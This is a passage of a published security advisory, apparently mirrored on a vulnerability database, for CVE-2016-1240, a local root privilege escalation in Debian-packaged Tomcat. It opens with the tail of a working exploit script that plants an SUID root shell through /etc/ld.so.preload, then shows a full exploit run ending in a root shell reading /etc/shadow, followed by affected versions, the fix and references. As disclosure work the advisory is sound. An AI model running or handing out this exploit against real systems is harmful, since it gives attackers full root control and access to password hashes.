rootshell ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi # Execute the rootshell echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" $BACKDOORPATH -p # Job done. cleanexit 0 --------------[ EOF ]-------------------- ``` Example exploit run: ~~~~~~~~~~~~~~ ``` tomcat7@ubuntu:/tmp$ id uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) tomcat7@ubuntu:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit CVE-2016-1240 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit in [active] mode with the following privileges: uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh [+] Symlink created at: lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload [+] Waiting for Tomcat to re-open the logs/Tomcat service restart... You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh Please tell me you're seeing this too ;) [+] Executing the rootshell /tmp/tomcatrootsh now! tomcatrootsh-4.3# id uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) tomcatrootsh-4.3# whoami root tomcatrootsh-4.3# head -n3 /etc/shadow root:$6$oaf[cut]:16912:0:99999:7::: daemon:*:16912:0:99999:7::: bin:*:16912:0:99999:7::: tomcatrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` VI. BUSINESS IMPACT ------------------------- Local attackers who have gained access to tomcat user account (for example remotely via a vulnerable web application, or locally via weak webroot perms), could escalate their privileges to root and fully compromise the affected system. VII. SYSTEMS AFFECTED ------------------------- The following Debian package versions are affected: Tomcat 8 <= 8.0.36-2 Tomcat 7 <= 7.0.70-2 Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 A more detailed lists of affected packages can be found at: Debian: https://security-tracker.debian.org/tracker/CVE-2016-1240 Ubuntu: http://www.ubuntu.com/usn/usn-3081-1/ Other systmes that use Tomcat packages provided by Debian may also be affected. VIII. SOLUTION ------------------------- Debian Security Team was contacted and has fixed affected upstream packages. Update to the latest tomcat packages provided by your distribution. IX. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html The exploit's sourcecode http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh CVE-2016-1240 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240 Ubuntu Security Notice USN-3081-1: http://www.ubuntu.com/usn/usn-3081-1/ Debian Security Advisory DSA-3669-1 (tomcat7): https://lists.debian.org/debian-security-announce/2016/msg00249.html https://www.debian.org/security/2016/dsa-3669 Debian Security Advisory DSA-3670-1 (tomcat8): https://www.debian.org/security/2016/dsa-3670 https://security-tracker.debian.org/tracker/CVE-2016-1240 X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 30.09.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
idSSV:92455
last seen2017-11-19
modified2016-10-04
published2016-10-04
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-92455
titleApache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation

References